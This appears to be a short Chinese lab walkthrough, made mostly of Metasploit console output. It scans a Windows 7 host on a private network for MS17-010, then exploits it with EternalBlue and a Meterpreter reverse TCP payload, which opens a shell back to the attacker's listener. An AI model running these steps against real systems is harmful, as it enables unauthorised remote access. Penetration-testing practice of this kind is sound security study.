目标机信息,操作系统。
启动MSF
bash
use auxiliary/scanner/smb/smb_ms17_010
bash
msf6 > use auxiliary/scanner/smb/smb_ms17_010
msf6 auxiliary(scanner/smb/smb_ms17_010) > show options
Module options (auxiliary/scanner/smb/smb_ms17_010):
Name Current Setting Required Description
---- --------------- -------- -----------
CHECK_ARCH true no Check for architecture on vulnerable hosts
CHECK_DOPU true no Check for DOUBLEPULSAR on vulnerable hosts
CHECK_PIPE false no Check for named pipe on vulnerable hosts
NAMED_PIPES /usr/share/metasploit-framework/da yes List of named pipes to check
ta/wordlists/named_pipes.txt
RHOSTS yes The target host(s), see https://docs.metasploit.com/docs/usi
ng-metasploit/basics/using-metasploit.html
RPORT 445 yes The SMB service port (TCP)
SMBDomain . no The Windows domain to use for authentication
SMBPass no The password for the specified username
SMBUser no The username to authenticate as
THREADS 1 yes The number of concurrent threads (max one per host)
View the full module info with the info, or info -d command.
msf6 auxiliary(scanner/smb/smb_ms17_010) > set rhost 192.168.150.168
rhost => 192.168.150.168
msf6 auxiliary(scanner/smb/smb_ms17_010) > run
[+] 192.168.150.168:445 - Host is likely VULNERABLE to MS17-010! - Windows 7 Home Basic 7601 Service Pack 1 x64 (64-bit)
[*] 192.168.150.168:445 - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/smb/smb_ms17_010) >
存在漏洞。
利用漏洞
msf6 auxiliary(scanner/smb/smb_ms17_010) > use exploit/windows/smb/ms17_010_eternalblue
[*] No payload configured, defaulting to windows/x64/meterpreter/reverse_tcp
msf6 exploit(windows/smb/ms17_010_eternalblue) > show options
Module options (exploit/windows/smb/ms17_010_eternalblue):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/bas
ics/using-metasploit.html
RPORT 445 yes The target port (TCP)
SMBDomain no (Optional) The Windows domain to use for authentication. Only affects Windows
Server 2008 R2, Windows 7, Windows Embedded Standard 7 target machines.
SMBPass no (Optional) The password for the specified username
SMBUser no (Optional) The username to authenticate as
VERIFY_ARCH true yes Check if remote architecture matches exploit Target. Only affects Windows Ser
ver 2008 R2, Windows 7, Windows Embedded Standard 7 target machines.
VERIFY_TARGET true yes Check if remote OS matches exploit Target. Only affects Windows Server 2008 R
2, Windows 7, Windows Embedded Standard 7 target machines.
Payload options (windows/x64/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 192.168.150.130 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic Target
View the full module info with the info, or info -d command.
msf6 exploit(windows/smb/ms17_010_eternalblue) > set rhosts 192.168.150.168
rhosts => 192.168.150.168
msf6 exploit(windows/smb/ms17_010_eternalblue) > run
[*] Started reverse TCP handler on 192.168.150.130:4444
[*] 192.168.150.168:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
[+] 192.168.150.168:445 - Host is likely VULNERABLE to MS17-010! - Windows 7 Home Basic 7601 Service Pack 1 x64 (64-bit)
[*] 192.168.150.168:445 - Scanned 1 of 1 hosts (100% complete)
[+] 192.168.150.168:445 - The target is vulnerable.
[*] 192.168.150.168:445 - Connecting to target for exploitation.
[+] 192.168.150.168:445 - Connection established for exploitation.
[+] 192.168.150.168:445 - Target OS selected valid for OS indicated by SMB reply
[*] 192.168.150.168:445 - CORE raw buffer dump (40 bytes)
[*] 192.168.150.168:445 - 0x00000000 57 69 6e 64 6f 77 73 20 37 20 48 6f 6d 65 20 42 Windows 7 Home B
[*] 192.168.150.168:445 - 0x00000010 61 73 69 63 20 37 36 30 31 20 53 65 72 76 69 63 asic 7601 Servic
[*] 192.168.150.168:445 - 0x00000020 65 20 50 61 63 6b 20 31 e Pack 1
[+] 192.168.150.168:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 192.168.150.168:445 - Trying exploit with 12 Groom Allocations.
[*] 192.168.150.168:445 - Sending all but last fragment of exploit packet
[*] 192.168.150.168:445 - Starting non-paged pool grooming
[+] 192.168.150.168:445 - Sending SMBv2 buffers
[+] 192.168.150.168:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 192.168.150.168:445 - Sending final SMBv2 buffers.
[*] 192.168.150.168:445 - Sending last fragment of exploit packet!
[*] 192.168.150.168:445 - Receiving response from exploit packet
[+] 192.168.150.168:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 192.168.150.168:445 - Sending egg to corrupted connection.
[*] 192.168.150.168:445 - Triggering free of corrupted buffer.
[*] Sending stage (200774 bytes) to 192.168.150.168
[+] 192.168.150.168:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 192.168.150.168:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 192.168.150.168:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[*] Meterpreter session 1 opened (192.168.150.130:4444 -> 192.168.150.168:49172) at 2023-11-08 16:43:52 +0800
meterpreter >
成功进入 meterpreter
bash
meterpreter > cd
Usage: cd directory
meterpreter > cd C:
meterpreter > pwd
C:\Windows
meterpreter > cd
cd AppCompat\\ cd Offline\ Web\ Pages\\ cd Vss\\
cd AppPatch\\ cd PLA\\ cd Web\\
cd Boot\\ cd Panther\\ cd addins\\
cd Branding\\ cd Performance\\ cd assembly\\
cd Cursors\\ cd PolicyDefinitions\\ cd debug\\
cd DigitalLocker\\ cd Prefetch\\ cd diagnostics\\
cd Downloaded\ Program\ Files\\ cd Registration\\ cd en-US\\
cd Fonts\\ cd Resources\\ cd inf\\
cd Globalization\\ cd SchCache\\ cd rescache\\
cd Help\\ cd ServiceProfiles\\ cd schemas\\
cd IME\\ cd Setup\\ cd security\\
cd Installer\\ cd SoftwareDistribution\\ cd servicing\\
cd L2Schemas\\ cd Speech\\ cd system\\
cd LiveKernelReports\\ cd SysWOW64\\ cd tracing\\
cd Logs\\ cd System32\\ cd twain_32\\
cd Media\\ cd TAPI\\ cd winsxs\\
cd Microsoft.NET\\ cd Tasks\\ cd zh-CN\\
cd ModemLogs\\ cd Temp\\
meterpreter > cd